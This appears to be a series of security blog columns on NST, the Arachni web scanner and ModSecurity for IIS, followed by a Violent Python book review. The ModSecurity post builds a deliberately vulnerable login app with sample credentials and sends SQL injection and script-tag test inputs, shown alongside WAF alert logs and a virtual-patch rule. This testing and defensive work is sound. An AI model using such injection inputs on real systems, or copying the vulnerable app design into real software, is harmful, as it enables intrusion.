Paul also shared something I enjoyed, as acronyms are so common in our trade. He mentioned that the NST distribution can be used in many situations. One of his personal favorites is related to the FIRST Robotics Competition (FRC) which occurs each year. FIRST for Paul is For Inspiration and Recognition of Science and Technology, where I am more accustomed to its use as Forum for Incident Response and Security Teams. Paul mentors FIRST team 868, the TechHounds at Carmel High School in Indiana, and in FRC competitions teams have used (or could use) NST during a hectic build season to:
·      Quickly identify which network components involved with operating the robot are "alive"
o   From the WUI menu: Security -> Active Scanners -> ARP Scan (arp-scan)
·         Observe how much network traffic increases or decreases as we adjust the IP based robot camera settings
o   From the WUI menu: Network -> Monitors -> Network Interface Bandwidth Monitor
·         Capture packets between the robot and the controlling computer
·         Scan the area for WiFi traffic and use this information to pick frequencies for robot communications that are not heavily used
·         Set up a Subversion and Trac server for managing source code through the build season.
o   From the WUI menu: System -> File System Management -> Subversion Manager
·         Teach the benefits of scripting and automating tasks
·         Provide an environment that can be expanded and customized
While Paul and team have used NST for robotics, it’s quite clear how their use case bullet list applies to the incident responder and network security analyst. 

Installing NST

NST, as an ISO, can be run as a LiveCD, installed to dedicated hardware, or run as a virtual machine. If you intend to take advantage of the Multi-Tap Network Packet Capture interface feature with your NST installation set up as a centralized, aggregating sensor, then you'll definitely want to utilize dedicated hardware with multiple network interfaces. As an example, Figure 1 displays using NST to capture network and port address translation traffic across a firewall boundary.

Figure 1: Multi-Tap Network Packet Capture Across A Firewall Boundary - NAT/PAT Traffic
Once booted into NST you can navigate from Applications to System Tools to Install NST to Hard Drive in order to execute a dedicated installation.
Keep in mind that when virtualizing you could enable multiple NICs to leverage multi-tap, but your performance will be limited as you’d likely do so on a host system with one NIC.

Using NST

NST use centers around the WUI; access it via Firefox on the NST installation at http://127.0.0.1/nstwui/main.cgi. 
The first time you log in, you'll be immediately reminded to change the default password (nst2003). After doing so, log back in and select Tools -> Network Widgets -> IPv4 Address. Once you know what the IP address is, you can opt to use the NST WUI from another browser. My session as an example: https://192.168.153.132/nstwui/index.cgi.
Per Ron's above-mentioned tool enhancements, let's explore Single-Tap Network Packet Capture (I'm running NST as a VM). Click Network -> Protocol Analyzers -> Single-Tap Network Packet Capture, where you'll be presented with a number of options regarding how you'd like to configure the capture. You can choose to define the likes of duration, file size, and packet count, or select predefined short or long capture sessions as seen in Figure 2.

Figure 2: Configure a Single-Tap capture with NST
If you accepted the defaults for capture storage location, you can click Browse and find the results of your efforts in /var/nst/wuiout/wireshark. Now here's where the cool comes in. CloudShark (yep, Wireshark in the cloud) allows you to "secure, share, and analyze capture files anywhere, on any device" via either cloudshark.org or a CloudShark appliance. Please note that capture files uploaded to cloudshark.org are not secured by default and can be viewed by anyone who knows the correct URL. You'll need an appliance or CloudShark Enterprise to secure and manage captures. That aside, the premise of CloudShark is appealing and NST integrates CloudShark directly. From the Tools menu select Network Widgets, then CloudShark Upload Manager. I'd already uploaded malicious.pcap as seen in Figure 3.

Figure 3: CloudShark tightly integrated with NST
Users need only click on View Network Packet Captures in the upload manager and they’ll be directed right to the CloudShark instance of their uploaded capture as seen in Figure 4.

Figure 4: Capture results displayed via CloudShark
Many of the features you’d expect from a local instance of Wireshark are available to the analyst, including graphs, conversations, protocol decodes, and follow stream.

NST also includes the Network Interface Bandwidth Monitor. Select Network -> Monitors -> Network Interface Bandwidth Monitor. A bandwidth monitor for any interface present on your NST instance will be available to you (eth0 and lo on my VM) as seen in Figure 5.

Figure 5: NST’s Network Interface Bandwidth Monitor
You can see the 100+ kbps spikes I generated against eth0 with a quick Nmap scan as an example.

NST's geolocation capabilities are many, but be sure to set up the NST system to geolocate data first. I uploaded a multiple-host PCAP (P2P traffic) via the Network Packet Capture Manager, clicked the A (attach) button under Action, and was then redirected back to Network -> Protocol Analyzers -> Single-Tap Network Packet Capture. I then chose to use the Text-Based Protocol Analyzer Decode option as described on the NST Wiki and clicked the Hosts – Google Maps button. This particular capture gave NST a lot of work to do as it includes thousands of IPs, but the resulting geolocated visualization as seen in Figure 6 is well worth it.

Figure 6: P2P bot visually geolocated via NST
If we had page space available to show you the whole world you’d see that the entire globe is represented by this bot, but I’m only showing you North America and Europe.

As discussed in recent OSINT-related toolsmiths, there's even an NST OSINT feature called theHarvester, found under Security -> Information Search -> theHarvester. Information gathering with theHarvester includes e-mail accounts, user names, hostnames, and domains from different public internet sources.
So many features, so little time. Pick an item from the menu and drill in. There’s a ton of documentation under the Docs menu too, including the NST Wiki, so you have no excuses not to jump in head first.

In Conclusion

NST is one of those offerings where the few pages dedicated to it in toolsmith don't do it justice. NST is incredibly feature-rich and invites the user to explore while the hours sneak by unnoticed. The NST WUI has created a learning environment I will be incorporating into my network security analysis teaching regimens. Whether you're new to network security analysis or a salty old hand, NST is a worthy addition to your tool collection.
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

Acknowledgements

Paul Blankenbaker and Ron Henderson, NST project leads

toolsmith: Arachni - Web Application Security Scanner

Part 1 of 2 - Web Application Security Flaw Discovery and Prevention


Prerequisites/dependencies
Ruby 1.9.2 or higher in any *nix environment

Introduction
This month's issue kicks off a two-part series on web application security flaw discovery and prevention, beginning with Arachni. As this month's topic is another case of mailing lists facilitating great toolsmith topics, I'll begin by recommending a few you should join if you haven't already. The Web Application Security Consortium mailing list is a must, as are the SecurityFocus lists. I favor their Penetration Testing and Web Application Security lists, but they have many others as well. As you can imagine, these two make sense for me given my focus on web application security and penetration testing, and it was via SecurityFocus that I received news of the latest release of Arachni. Arachni is a high-performance, modular, open source web application security scanning framework written in Ruby. It was refreshing to discover a web app scanner I had not yet tested. I spend a lot of time with the likes of Burp, ZAP, and Watobo but strongly advocate expanding the arsenal.
Arachni’s developer/creator is Tasos "Zapotek" Laskos, who kindly provided details on this rapidly maturing tool and project.
Via email, Tasos indicated that to date, Arachni's role has been that of an experiment/learning-exercise hybrid, mainly focused on doing things a little bit differently. He's glad to say that the fundamental project goals have been achieved; Arachni is fast, relatively simple, quite accurate, open source, and quite flexible in the ways in which it can be deployed. In addition, as of late, stability and testing have been given top priority in order to ensure that the framework won't exhibit performance degradation as the code-base expands.
With a strong foundation laid and a clear road map, future plans for Arachni include pushing the envelope with version 0.4.2, which includes improved distributed, high-performance scan features such as the new distributed crawler (under current development), a new, cleaner, more stable and attractive Web User Interface, and general code clean-up.
Version 0.5 is where a lot of interesting work will take place, as the Arachni team will be attempting to break new ground with native DOM and JavaScript support, with the intent of allowing a depth of analysis beyond what's generally possible today from either open source or commercial systems. According to Tasos, most, if not all, current scanners rely on external browser engines to perform their duties, bringing with them a few penalties (performance hits, loss of control, limited inspection capabilities, design compromises, etc.), which Arachni will be able to avoid. This kind of functionality, especially from an open and flexible system, will be greatly beneficial to web application testing in general, and not just in a security-related context.

Arachni success stories include incredibly cool features such as WAF Realtime Virtual Patching. At OWASP AppSec DC 2012, Trustwave SpiderLabs' Ryan Barnett discussed the concept of dynamic application security testing (DAST) data exported and then imported into a web application firewall (WAF) for targeted remediation. In addition to stating that the Arachni scanner is an "absolutely awesome web application scanner framework," Ryan describes how to integrate export data from Arachni with ModSecurity, the WAF for which he is OWASP ModSecurity Core Rule Set (CRS) project leader. Take note here, as next month in toolsmith we're going to discuss ModSecurity for IIS as part two of this series and will follow Ryan's principles for DAST to WAF.
Other Arachni successes include highly customized scripted audits and easy incorporation into testing platforms (by virtue of its distributed features). Tasos has received a lot of positive feedback and has been pleasantly surprised that there has not been one unsatisfied user, even in Arachni's early, immature phases. Many users come to Arachni out of frustration with the currently available tools and are quite happy with the results after giving it a try; Arachni offers a decent alternative while simplifying web application security assessment tasks.
Arachni benefits from excellent documentation and support via its wiki; be sure to give it a good once-over before beginning installation and use.

Installing Arachni

On an Ubuntu 12.10 instance, I first made sure I had all dependencies met via sudo apt-get install build-essential libxml2-dev libxslt1-dev libcurl4-openssl-dev libsqlite3-dev libyaml-dev zlib1g-dev ruby1.9.1-dev ruby1.9.1.
For developers' sake, this includes Gem support, so thereafter one need only issue sudo gem install arachni to install Arachni. However, the preferred method is use of the appropriate system packages from the latest downloads page.
While Arachni features robust CLI use, for presentation's sake we'll describe Arachni use with the Web UI. Start it via arachni_web_autostart, which will initiate a Dispatcher and the UI server. The last step is to point your browser to http://localhost:4567, accept the default settings, and begin use.

Arachni in use

Of interest as you begin Arachni use is the Dispatcher, which spawns RPC instances and allows you to attach to, pause, resume, and shut down Arachni instances. This is extremely important for users who wish to configure Arachni instances in a high performance grid (think a web application security scanning cluster with a master and slave configuration). Per the wiki, "this allows scan-time to be severely decreased, by as much as n times less under ideal circumstances, where n equals the number of running instances."
You can configure Arachni’s web UI to run under SSL and provide HTTP Basic authentication if you wish to lock use down. Refer to the wiki entry for the web user interface for more details.
Before beginning a simple scan (one Dispatcher), let's quickly review Arachni's modules and plugins. Each has a tab in Arachni's primary UI view. The 45 modules are divided into Audit (22) and Recon (23) options, where the audit modules actively test the web application via inputs such as parameters, forms, cookies, and headers, while the recon modules passively test the web application, focusing on server configuration, responses, and specific directories and files. I particularly like the additional SSN and credit card number disclosure modules as they are helpful for OSINT, as well as the Backdoor module, which looks to determine if the web application you're assessing is already owned. Of note from the Audit options is the Trainer module, which probes all inputs of a given page in order to uncover new input vectors and trains Arachni by analyzing the server responses. Arachni modules are all enabled by default. Arachni plugins offer preconfigured auto-logins (great when spidering), proxy settings, and notification options, along with some pending plugins supported in the CLI version but not yet ready for the Web UI as of v.0.4.1.1.
To start a scan, navigate to the Start a scan tab and confirm that a Dispatcher is running. You should see the likes of @localhost:7331 (host and port), along with the number of running scans as well as RAM and CPU usage. Then paste a URL into the URL form and select Launch Scan as seen in Figure 1.
Figure 1: Launching an Arachni scan

While the scan is running you can monitor the Dispatcher status via the Dispatchers tab as seen in Figure 2.

Figure 2: Arachni Dispatcher status
From the Dispatchers view you can choose to Attach to the running Instance (there will be multiples if you've configured a high performance grid), which will give a real-time view of the scan statistics, percentage of completion for the running instance, scanner output, and results for findings discovered as seen in Figure 3. Dispatchers provide Instances; Instances perform the scans.

Figure 3: Arachni scan status
Once the scan is complete, as you might imagine, the results report will be available to you in the Reports tab. As an example I chose the HTML output, but realize that you can also select JSON, text, YAML, and XML, as well as binary output such as Metareport, Marshal report, and even Arachni Framework Reporting. Figure 4 represents the HTML-based results of a scan against NOWASP Mutillidae.

Figure 4: HTML Arachni results
Even the reports are feature-rich, with a summary tab offering graphs, issues, remedial guidance, and plugin results, along with a sitemap and configuration settings.
The results are accurate too; in my preliminary testing I found very few false positives. When Arachni isn't definitive about results, it even goes so far as to label them "untrusted (and may in fact be false positives) because at the time they were identified the server was exhibiting some kind of anomalous behavior or there was 3rd party interference (like network latency for example)." Nice, I love truth and transparency in my test results.
I am really excited to see Arachni work at scale. I intend to test it very broadly on large applications using a high performance grid. This is definitely one project I’ll keep squarely on my radar screen as it matures through its 0.4.2 and 0.5 releases.

In Conclusion

Join us again next month as we resume this discussion and take Arachni results and leverage them for Realtime Virtual Patching with ModSecurity for IIS. By then I will have tested Arachni's clustering capabilities as well, so we should have some real benefit to look forward to. Please feel free to seek support via the support portal, file a bug report via the issue tracker, or reach out to Tasos via Twitter or email as he looks forward to feedback and feature requests.
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

Acknowledgements

Tasos "Zapotek" Laskos, Arachni project lead

CTIN Digital Forensics Conference - No fluff, all forensics

For those of you in the Seattle area (or willing to travel) who are interested in digital forensics, there is a great opportunity to learn and socialize coming up in March.
The CTIN Digital Forensics Conference will be March 13 through 15, 2013 at the Hilton Seattle Airport & Conference Center. CTIN, the Computer Technology Investigators Network, is a non-profit, free-membership organization comprised of public and private sector computer forensic examiners and investigators focused on high-tech security, investigation, and prosecution of high-tech crimes.

Topics slated for the conference agenda are many, with great speakers to discuss them in depth:
Windows Time Stamp Forensics, Incident Response Procedures, Tracking USB Devices, Timeline Analysis with EnCase, Internet Forensics, Placing the Suspect Behind the Keyboard, Social Network Investigations, Triage, Live CDs (WinFE & Linux), F-Response and Intella, Lab - Hard Drive Repair, Mobile Device Forensics, Windows 7/8 Forensics, Child Pornography, Legal Update, Counter-forensics, Linux Forensics, X-Ways Forensics, Expert Testimony, ProDiscover, Live Memory Forensics, EnCase, Open Source Forensic Tools, Cell Phone Tower Analysis, Mac Forensics, Registry Forensics, Malware Analysis, iPhone/iPad/other Apple products, Imaging Workshop, Paraben Forensics, and Virtualization Forensics.


Register before 1 DEC 2012 for $295, and $350 thereafter.

While you don't have to be a CTIN member to attend I strongly advocate your joining and supporting CTIN.

toolsmith: ModSecurity for IIS

Part 2 of 2 - Web Application Security Flaw Discovery and Prevention

Prerequisites/dependencies
Windows OS with IIS (Win2k8 used for this article)
SQL Server 2005 Express SP4 and Management Studio Express for vulnerable web app
.NET Framework 4.0 for ModSecurity IIS

Introduction

December’s issue continues where we left off in November with part two in our series on web application security flaw discovery and prevention. In November we discussed Arachni, the high-performance, modular, open source web application security scanning framework. This month we’ll follow the logical work flow from Arachni’s distributed, high-performance scan results to how to use the findings as part of mitigation practices. One of Arachni’s related features is WAF Realtime Virtual Patching.
Trustwave SpiderLabs' Ryan Barnett has discussed the concept of dynamic application security testing (DAST) data that can be imported into a web application firewall (WAF) for targeted remediation. This discussion included integrating export data from Arachni into ModSecurity, the cross-platform, open source WAF for which he is the OWASP ModSecurity Core Rule Set (CRS) project leader. I reached out to Ryan for his feedback with particular attention to ModSecurity for IIS, Microsoft's web server.
He indicated that WAF technology has gained traction as a critical component of protecting live web applications for a number of key reasons, including:
1)      Gaining insight into HTTP transactional data that is not provided by default web server logging
2)      Utilizing Virtual Patching to quickly remediate identified vulnerabilities
3)      Addressing PCI DSS Requirement 6.6
The ModSecurity project is just now a decade old (first released in November 2002), has matured significantly over the years, and is the most widely deployed WAF in existence, protecting millions of websites. "Until recently, ModSecurity was only available as an Apache web server module. That changed, however, this past summer when Trustwave collaborated with the Microsoft Security Response Center (MSRC) to bring the ModSecurity WAF to both the Internet Information Services (IIS) and nginx web server platforms. With support for these platforms, ModSecurity now runs on approximately 85% of internet web servers."
Among the features that make ModSecurity so popular, there are a few key capabilities that make it extremely useful:
·         It has an extensive audit engine which allows the user to capture the full inbound and outbound HTTP data. This is not only useful when reviewing attack data but is also extremely valuable for web server administrators who need to troubleshoot errors.
·         It includes a powerful, event-driven rules language which allows the user to create very specific and accurate filters to detect web-based attacks and vulnerabilities.
·         It includes an advanced Lua API which provides the user with a full-blown scripting language to define complex logic for attack and vulnerability mitigation.
·         It also includes the capability to manipulate live transactional data.  This can be used for a variety of security purposes including setting hacker traps, implementing anti-CSRF tokens, or Cryptographic HASH tokens to prevent data manipulation.
In short, Ryan states that ModSecurity is extremely powerful and provides a very flexible web application defensive framework that allows organizations to protect their web applications and quickly respond to new threats.
I also sought details from Greg Wroblewski, Microsoft’s lead developer for ModSecurity IIS.
“As ModSecurity was originally developed as an Apache web server module, it was technically challenging to bring together two very different architectures. The team managed to accomplish that by creating a thin layer abstracting ModSecurity for Apache from the actual server API. During the development process it turned out that the new layer is flexible enough to create another ModSecurity port for the nginx web server. In the end, the security community received a new cross-platform firewall, available for the three most widely used web servers.
The current ModSecurity development process (still open, recently migrated to GitHub) preserves compatibility of features between the three ported versions. For the IIS version, only features that rely on specific web server behavior show functional differences from the Apache version, while the nginx version currently lacks some of the core features (like response scanning and content injection) due to limited extensibility of the server. Most ModSecurity configuration files can be used without any modifications between Apache and IIS servers. The upcoming release of the RTM version for IIS will include a sample of the ModSecurity OWASP Core Rule Set in the installer."

Installing ModSecurity for IIS

In order to test the full functionality of ModSecurity for IIS I needed to create an intentionally vulnerable web application, and did so following guidelines provided by Metasploit Unleashed. The author wrote these guidelines for Windows XP SP2; I chose Windows Server 2008 just to be contrarian. I first established a Win2k8 virtual machine, enabled the IIS role, downloaded and installed SQL Server 2005 Express SP4, .NET Framework 4.0, and SQL Server 2005 Management Studio Express, then downloaded the ModSecurity IIS 2.7.1 installer. We'll configure ModSecurity IIS after building our vulnerable application. When configuring SQL Server 2005 Express, ensure you enable SQL Server Authentication and set the password to something you'll use in the connection string established in Web.config. I used p@ssw0rd1 to meet required complexity. Note: it's "easier" to build a vulnerable application using SQL Server 2005 Express rather than 2008 or later; for time's sake and reduced troubleshooting just work with 2005. We're in test mode here, not production. That said, remember, you're building this application to be vulnerable by design. Conduct this activity only in a virtual environment and do not expose it to the Internet. Follow the Metasploit guidelines carefully, but remember to establish a proper connection string in the Web.config (line 4) and build it from this sample I'm hosting for you rather than the one included with the guidelines. As an example, I needed to establish my actual server name rather than localhost, I defined my database name as crapapp instead of WebApp per the guidelines, and used p@ssw0rd1 instead of password1 as described:
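For illustration, the connection string line in my Web.config took roughly this shape (the key name and server value shown here are representative, not verbatim from the hosted sample):

<add key="ConnectionString" value="server=WIN2K8;uid=sa;pwd=p@ssw0rd1;database=crapapp;" />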
I also utilized configurations recommended for the pending ModSecurity IIS install so go with my version.
Once you're finished with your vulnerable application build you should browse to http://localhost and first pass credentials that you know will fail to ensure database connectivity. Then test one of the credential pairs established in the users table, admin/s3cr3t as an example. If all has gone according to plan you should be treated to a successful login message as seen in Figure 1.

FIGURE 1: A successful login to CrapApp
ModSecurity IIS installation details are available via TechNet but I’ll walk you through a bit of it to help overcome some of the tuning issues I ran into. Make sure you have the full version of .NET 4.0 installed and patch it in full before you execute the ModSecurity IIS installer you downloaded earlier.
Download the ModSecurity OWASP Core Rule Set (CRS) and, as a starting point, copy the files from base_rules to a crs directory you create in C:\inetpub\wwwroot. Also put the test.conf file I'm hosting for you in C:\inetpub\wwwroot. This will call the just-mentioned CRS that Ryan maintains and also allow you to drop any custom rules you may wish to create right in test.conf.
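To give you a sense of its shape, a minimal test.conf amounts to something like the following (a sketch only; the hosted copy is tuned for this walkthrough):

SecRuleEngine On
SecDefaultAction "phase:2,deny,log"
Include c:\inetpub\wwwroot\crs\*.conf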
There are a few elements to be comfortable with here. Watch the Windows Application logs via Event Viewer, both to debug any errors you receive and to view ModSecurity alerts once properly configured. I'm hopeful that the debugging time I spent will help save you a few hours, but watch those logs regardless. Also make regular use of Internet Information Services (IIS) Manager to refresh the DefaultAppPool under Application Pools, as well as to restart the IIS instance after you make config changes. Finally, this experimental installation, intended to help get you started, is running in active mode versus passive. It will both detect and block what the CRS notes as malicious. As such, you'll want to initially comment out all the HTTP Policy rules in order to play with the CrapApp we built above. To do so, open modsecurity_crs_30_http_policy.conf in the crs directory and comment out all lines that start with SecRule. Again, we're in experiment mode here. Don't deploy ModSecurity in production with the SecDefaultAction directive set to "block" without a great deal of testing in passive mode first or you'll likely blackhole known good traffic.

Using ModSecurity and virtual patching to protect applications

Now that we're fully configured, I'll show you the results of three basic detections, then close with a bit of virtual patching for your automated web application protection pleasure. Figure 2 is a mashup of a login attempt via our CrapApp with a path traversal attack and the resulting detection and block as noted in the Windows Application log.

FIGURE 2: Path traversal attack against CrapApp denied
Similarly, a simple SQL injection such as ‘1=1-- against the same form field results in the following Application log entry snippet:
[msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:txtLogin: '1=1--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"]

Note the various tags including a match to the appropriate OWASP Top 10 entry as a well as the relevant section of the PCI DSS.
Ditto if we pop in a script tag via the txtLogin parameter:
[data "Matched Data: "] [ver "OWASP_CRS/2.2.6"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"]
    
Finally, we're ready to connect our Arachni activities in Part 1 of this campaign to our efforts with ModSecurity IIS. There are a couple of ways to look at virtual patching, as amply described by Ryan. His latest focus has been more on dynamic application security testing as actually triggered via ModSecurity. There is now Lua scripting that integrates ModSecurity and Arachni over RPC, where a specific signature hit from ModSecurity will contact the Arachni service and kick off a targeted scan. At last check this code was still experimental and likely to be challenging with the IIS version of ModSecurity. That said, we can direct our focus in the opposite direction and utilize Ryan's automated virtual patching script, arachni2modsec.pl, where we gather Arachni scan results and automatically convert the XML export into rules for ModSecurity. These custom rules will then protect the vulnerabilities discovered by Arachni while you haggle with the developers over how long it's going to take them to actually fix the code.
To test this functionality I scanned the CrapApp from the Arachni instance on the Ubuntu VM I built for last month's article. I also set the SecDefaultAction directive to "pass" in my test.conf file to ensure the scanner is not blocked while it discovers vulnerabilities. Currently the arachni2modsec.pl script writes rules specifically for SQL Injection, Cross-site Scripting, Remote File Inclusion, Local File Inclusion, and HTTP Response Splitting. The process is simple; assuming the results file is results.xml, arachni2modsec.pl -f results.xml will create modsecurity_crs_48_virtual_patches.conf. On my ModSecurity IIS VM I'd then copy modsecurity_crs_48_virtual_patches.conf into the C:\inetpub\wwwroot\crs directory and refresh the DefaultAppPool. Figure 3 gives you an idea of the resulting rule.

FIGURE 3: arachni2modsec script creates rule for ModSecurity IIS
Note how the rule closely resembles the alert spawned when I passed the simple SQL injection attack to CrapApp earlier in the article. Great stuff, right?
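In sketch form, a virtual patch of this kind takes roughly the following shape (illustrative rather than the script's literal output; the page name, rule ID, and detection regex are placeholders):

SecRule REQUEST_FILENAME "@contains /default.aspx" "chain,phase:2,t:none,block,id:'48001',msg:'Virtual Patch for SQL Injection via txtLogin'"
    SecRule ARGS:txtLogin "(['\"]|--)"

The chained pair confines the check to the vulnerable page and parameter Arachni identified, rather than inspecting every request.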

In Conclusion

What a great way to wrap up 2012 with the conclusion of this two-part series on Web Application Security Flaw Discovery and Prevention. I’m thrilled with the performance of ModSecurity for IIS and really applaud Ryan and Greg for their efforts. There are a number of instances where I intend to utilize the ModSecurity port for IIS and will share feedback as I gather data. Please let me know how it’s working for you as well should you choose to experiment and/or deploy.
Good luck and Merry Christmas.
Stay tuned to vote for the 2012 Toolsmith Tool of the Year starting December 15th.
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

Acknowledgements

Ryan Barnett, Trustwave Spider Labs, Security Researcher Lead
Greg Wroblewski, Microsoft, Senior Security Developer

Choose the 2012 Toolsmith Tool of the Year

Merry Christmas and Happy New Year! It's that time again.
Please vote below to choose the best of 2012, the 2012 Toolsmith Tool of the Year.
We covered some outstanding information security-related tools in ISSA Journal's toolsmith during 2012; which one do you believe is the best?
I appreciate you taking the time to make your choice.
Review all 2012 articles here for a refresher on any of the tools listed in the survey.
You can vote through January 31, 2013. Results will be announced February 1, 2013.


toolsmith: Violent Python - A Book Review Applied to Security Analytics

Prerequisites/dependencies
Python interpreter
BackTrack 5 R3 is ideally suited to make immediate use of Violent Python scripts

Introduction
Happy New Year and congratulations on surviving the end of the world as we know it (nyah, nyah Mayan calendar). Hard to imagine we’re starting yet another year already; 2012 simply screamed by. Be sure to visit the HolisticInfoSec blog post for the 2012 Toolsmith Tool of the Year and vote for your favorite tool of 2012.
I thought I'd start off 2013 with a bit of a departure from the norm. Herein is the first treatment of a book as a tool, where the content and associated code can be utilized to perform duties specific to the information security practitioner. I can think of no better book with which to initiate this approach than TJ O'Connor's Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers, and Security Engineers. Yes, this implies that you should buy the book; trust me, it's worth every dime of the $34. Better still, TJ has donated all his proceeds to the Wounded Warrior Project. That said, I'll post TJ's three scripts we'll discuss here so as to whet your appetite. I've had the distinct pleasure of working with TJ as part of the SANS Technical Institute's graduate program where we, along with Beth Binde, wrote Assessing Outbound Traffic to Uncover Advanced Persistent Threat. I've known some extremely bright, capable information security experts in my day and I can comfortably say TJ is hands down amongst the very best of that small group. As part of his service as an officer in the U.S. Army (hooah), TJ has served as the course director for both computer exploitation and digital forensics at the US Military Academy and as a communications officer supporting tactical communications. His book maps nicely to a philosophy I embrace and incorporate in the workplace: security monitoring, incident response (and forensics), and attack and penetration testing are the three pillars of security analytics, each feeding and contributing to the others in close cooperation. As an example, capable security monitoring inevitably leads to a need for incident response, and after mitigation and remediation have ensued, penetration testing is key to validating that corrective measures were successful, which in turn helps the monitoring team assess and tune detection and alerting logic. Security analytics: the information security circle of life. :-)
How does a book such as TJ’s Violent Python reverberate with this philosophy? How about entire chapters dedicated to each of the above-mentioned pillars, including Python scripts for network traffic analysis (monitoring), forensic investigations (IR), and web recon and penetration testing. We’ll explore one script from each discipline shortly, but not before hearing directly from the author:
“In a lot of ways writing a book is a cathartic experience where you capture a lot of things you have done. All too often I'm writing scripts to achieve an immediate effect and then I throw away the script. For me the book was an opportunity to capture a lot of those small projects I've done and simplify the learning curve for others. My favorite example was the UAV takeover in the book. We show how to take over any really Ad-Hoc WiFi toys in under 70 lines of code. A few friends joked that I couldn't write a script in under 100 lines to crash a UAV. This was my chance to provide them a working concept and it worked! Unfortunately it left my daughter with a toy UAV cracked into several pieces as I refined the code. From a defensive standpoint, understanding a scripting language is absolutely essential in my opinion. The ability to parse data such as DNS traffic or geo-locate IP traffic (both shown in the book) can give a great deal of visibility. Forensics tools are great but the ability to build your own are even better. We show how to write tools to parse out iPhone backups for data and scrape for specific objects. The initial feedback from the book has been overwhelming and I've really enjoyed hearing positive feedback. No future plans right now but a good friend of mine has mentioned writing "Violent Powershell" so we'll see where that goes.”    
Violent Python provides readers the basis for scripts to attack network services, analyze digital artifacts, investigate network traffic for malicious activity, and data-mine social media, not to mention numerous other activities. This is a must-read book that includes a companion site with all the code discussed. Let’s take a closer look at three of these efficient and useful Python scripts.

Making Use of Violent Python

As noted above, I’ve posted the three scripts discussed in this section, along with the PCAP and the malicious PDF discussed, on my website. Email or Tweet for the zip passwords.
TJ suggests utilizing a BackTrack distribution given that many of the dependencies and libraries required to use the scripts in this book are inherent to BackTrack. We’ll follow suit on a BackTrack 5 R3 virtual machine. Before beginning, we’ll need to set up a few prerequisites. Execute easy_install pyPDF python-nmap pygeoip mechanize BeautifulSoup4 at the BT5R3 root prompt. This will install pygeoip as needed for our first exercise. I’m going to conduct these exercises a bit out of chapter sequence in order to follow the security analytics lifecycle starting with monitoring. This drops us first into Chapter 4 where we’ll utilize MaxMind’s GeoLiteCity to map IP addresses to cities. In order to do so, you’ll need to set up GeoLiteCity on BackTrack or your preferred system with the following steps:
1.  mkdir /opt/GeoIP
2.  cd /opt/GeoIP/
3.  wget http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz
4.  gunzip GeoLiteCity.dat.gz
You’ll then need to edit line 7 of geoPrint.py to read gi = pygeoip.GeoIP('/opt/GeoIP/GeoLiteCity.dat') or download the updated copy of the script I’ve posted for you.
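If you’d like a feel for the moving parts before you run it, consider this minimal sketch in the spirit of geoPrint.py (not TJ’s script verbatim; grab his copy for the real deal), using dpkt to walk the capture and pygeoip to resolve each destination against GeoLiteCity:

# geo_sketch.py: a minimal sketch in the spirit of geoPrint.py (not TJ's code)
import socket
import dpkt
import pygeoip

gi = pygeoip.GeoIP('/opt/GeoIP/GeoLiteCity.dat')

def geo_locate(ip):
    # record_by_addr returns None for unregistered (e.g. RFC 1918) addresses
    rec = gi.record_by_addr(ip)
    if rec:
        return '%s, %s' % (rec.get('city', 'Unknown'), rec.get('country_name', 'Unknown'))
    return 'Unregistered'

f = open('suspect.pcap', 'rb')
for ts, buf in dpkt.pcap.Reader(f):
    eth = dpkt.ethernet.Ethernet(buf)
    if isinstance(eth.data, dpkt.ip.IP):
        ip = eth.data
        src, dst = socket.inet_ntoa(ip.src), socket.inet_ntoa(ip.dst)
        print '[+] %s -> %s (%s)' % (src, dst, geo_locate(dst))
f.close()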

I’ve created a partially arbitrary scenario for you with which to walk through the security analytics lifecycle using Violent Python. To do so I’ll refer to what was, in 2009, an actual malicious domain used to host shellcode for PDF-based malware attacks. I grabbed a malicious PDF sample from Contagio, an excellent sample resource. The IP address I associate with this domain is where I am taking creative liberties, as the domain we’ll discuss, ax19.cn, no longer exists and there is no record of what its IP address was when it was in use. The PCAP we’ll use here is one I edited with bittwiste to arbitrarily introduce a suspect Chinese IP address to what was originally a packet capture from a machine compromised by Win32.Banload.MC. I’ve shared this PCAP and the PDF as mentioned above so you can try the Python scripts with them for yourself.
In this scenario, your analysis machine is Linux only. Just you, a Python interpreter, and a shell; no fuss, no muss.
As we’re starting in the monitoring phase, imagine you have a network for which the traffic baseline is well understood. You can assert, from one particular high value VLAN, that at no time should you ever see traffic bound for China.  Your netflow monitoring for that VLAN is showing far more egress traffic bound for IP space that is not on your approved list established from learned baselines. You initiate a real-time packet capture to confirm. Capture (suspect.pcap) in hand, you’d like to validate that the host is indeed conversing with an IP address in China. Violent Python’s geoPrint.py script is a great place to start as it leverages the above-mentioned GeoLiteCity data from MaxMind along with the PyGeoIP library from Jennifer Ennis and dpkt. Execute python geoPrint.py -p suspect.pcap and you’ll see results as noted in Figure 1.

Figure 1: geoPrint.py confirms Chinese takeout
Your internal host (RFC 1918, and thus unregistered) with IP address 192.168.248.114 is clearly conversing with 116.254.188.24 in Beijing. Uh-oh.
Your team now moves into incident response mode and seizes the host in question. You interview the system’s user, who indicates they received what they thought was a legitimate help desk notification to read a new policy. The email had an attached PDF file which the user downloaded and opened. Your suspicions are heightened; as such, you grab a copy of the PDF and head back to your analysis workstation. You’re interested to see if there is any interesting metadata in the PDF that might help further your investigation. You refer to Chapter 3 of Violent Python, which discusses Forensic Investigations with Python. The pdfRead.py script incorporates the PyPDF library which allows you to extract PDF document information (metadata) in addition to other capabilities. Execute python pdfRead.py -F suspect.pdf and dump the metadata as seen in Figure 2.

Figure 2: pdfRead.py dumps suspect PDF metadata
